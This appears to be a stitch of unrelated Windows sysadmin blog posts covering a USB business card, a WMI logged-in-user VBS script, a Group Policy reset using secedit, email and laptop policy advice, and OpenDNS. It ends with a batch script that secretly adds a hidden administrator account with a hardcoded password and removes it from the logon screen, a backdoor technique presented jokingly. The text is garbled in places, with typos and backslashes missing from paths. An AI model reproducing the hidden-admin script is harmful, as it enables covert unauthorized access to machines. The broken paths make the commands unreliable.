Frank Zhao put together a USB business card. It’s even got the instructions printed right on the silk screen of the PCB explaining how it should be used. It’s based on an AVR ATtiny85 microcontroller that runs the V-USB package which handles USB identification and communication protocols. The rest of the hardware is pretty standard, the uC draws power from the 5V USB rail, with a couple of 3.6V Zener diodes to drop the two data lines down to the proper level.

Once plugged in it waits until it detects three caps lock keypresses in a row, then spews a string of its own keypresses that type out Frank’s contact information in a text editor window (video after the break). It’s not as reusable as the mass storage business card because Frank didn’t breakout the pins on controller. Here arlayoe some more business cards that make you stand out.

This uses a simple vbs script I made (Using a function to get user input from Rob van der Woude) to get your input for a computer name or ip address on your Windows Domain, and returns the currently logged in user.

This makes a nice icon you can click anytime, and with a single line type (or paste) the computer’s address and voila’ you get a nice alert box with the currently logged in username! Just copy paste the following script into a new blank txt file, save and rename to WhosloggedIn.vbs It’s as easy as pie! The script leverages the WMI to ask for username. Many enterprise managment applications have similar features, but are slower to pull up. This is for those quick access trouble calls where you need it quick, and dirty! Script could be used as a base for expanding into collecting all the currently logged in users across the domain, and what computer they are logged in to.

'Get remote logged in user vbs script written by Jason Green http://green.cx
strComputer = UserInput( "Enter Computer Name:" )
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\" & strComputer & "rootcimv2")
Set colComputer = objWMIService.ExecQuery ("Select * from Win32_ComputerSystem")
For Each objComputer in colComputer
    Wscript.Echo objComputer.UserName
Next
Function UserInput( myPrompt )
' This function Written by Rob van der Woude http://www.robvanderwoude.com
    ' Check if the script runs in CSCRIPT.EXE
    If UCase( Right( WScript.FullName, 12 ) ) = "CSCRIPT.EXE" Then
        ' If so, use StdIn and StdOut
        WScript.StdOut.Write myPrompt & " "
        UserInput = WScript.StdIn.ReadLine
    Else
        ' If not, use InputBox( )
        UserInput = InputBox( myPrompt )
    End If
End Function

*Please not that this requires administrative authority on the client machines. Which in a domain, shouldn’t be a problem.

Sometimes viruses or people use Group Policy against us and we need to reset it back to the default. It can control access to a number of things in windows from logon scripts to access to the screensaver settings. Resetting it is actually pretty simple, which is why you shouldn’t rely on it solely to guard your network.

Group Policy

secedit /configure /db reset /cfg “c:windowssecuritytemplatessetup security.inf” /overwrite

Also, you should delete the registry.pol file if it exists:

del c:windowssystem32grouppolicymachineregistry.pol

Don’t forget to reboot! All the group policies should now be reset to default.

In your company, communication is the circulatory system that keeps business moving. Next in line after telephone, E-Mail is the second easiest way to reach someone online. Sending documents, personal information, jokes and virsus are the most common types for information to be sent through e-mail.

There are some serious security considerations that should be known to everyone who has any responsibility for their e-mail system and it’s users. E-Mail is NOT secure, EVER. I say this because unless your using it in house only, you never know where it’s going to go when you send it.

If you make a typo, someone else may get the e-mail. If, for example, you send and e-mail to someone@here.com but you sent it to someone@there.com well, there may not be a someone@there.com but the domain owner of there.com may be using a catch-all to read mail sent to any address @there.com and knows that people often mistake here.com for there.com. By doing this the owner of there.com is skimming any information that may be intended for here.com and may also be selling any e-mail address he finds.

E-Mail was invented in 1982 and was never intended to be used as long as it has been. So, as such it should be used appropriately and by implementing an E-Mail Security policy will help mitigate data leakage. Remember, educated users are in much less danger than users who are uninformed of the risks.

Here is sample E-Mail Policy that I use. Feel free to use it as a template for your own organization.

Why do you need a Laptop Policy?

Here is an example Laptop security policy. I have found it extremely helpful in aiding me in making mine. It’s difficult to think of all the different situations that can occur   and this template for a laptop security policy is just a lifesaver. I strongly encourage the enforcement of encrypting your company’s laptops because laptop theft is on the rise, and laptops were intended to be taken out into the world. It’s a company trip and you leave the room for some dinner, to return to find that your laptop is missing. Not only is your work and resources now robbed from you, but the hidden costs of data leakage in enormous. An average estimate for stolen data from Laptops results in $70,000 in damages per laptop in 2008. Can you afford NOT to take precautions?

Start with a strong Laptop Policy that stresses the importance of such things. Let me know if it looks like anything is missing.

Download from From ISO Security

Make your network safer, faster, smarter, and more reliable.

OpenDNS is a free service that works for networks of all sizes, from home networks to K-12 schools, SMBs and large enterprises.

Here is why I like OpenDNS and I use it on my networks, even at home!

It’s really easy to deploy, you only have to change your DNS Addresses to: 208.67.222.222 and 208.67.220.220

• Security

Industry-leading anti-phishing protects everyone on your network from fraudulent phishing scams.

Award-winning Web content filtering gives you the power to block up to 50 categories of content.

Detailed statistics empower you to understand your network traffic and spot trends before they become problems.

• Infrastructure

OpenDNS’s distributed network makes Web sites load noticeably faster on your network.

They use something called Anycast routing technology which is supposed to make your Internet more reliable.

• Navigation

Browser Shortcuts let your users map a short term to a long URL via the address bar.

Typo correction auto-corrects the most common typos in top-level domains.

OpenDNS Guide also provides helpful search results when your users try to visit a Web site that isn’t resolving. Ok, maybe that’s a little bit more for them to recoupe the costs of running those servers for us. But hey, at least I know they are not malicious…

Sometimes we need to remotly checkup on our network users using tools such as the Kaspersky Administration Kit, GoverLan, GFI Lan Guard, or the like. Or maybe we need to see what services they are running to check for spyware, or what printers are installed, etc. Well Microsoft has made this a breeze with Active Directory Servers, Domains, and Windows XP Pro and Vista Buisness.

Hidden Users added secretly... lol

@echo off
set UserID=MySeceretUser
set FullName=Doe, John set Comment=Administrative user
set Password=MySeceretPassword
REM Create the user:
net user "%UserID%" "%Password%" /fullname:"%FullName%" /usercomment:"%Comment%" /add
REM Add him to the Administrators group:
net localgroup "Administrators" "%UserID%" /add
REM Remove account from logon screen:
reg add "HKLMSoftwareMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /d "%UserID%" /t REG_DWORD /v "0"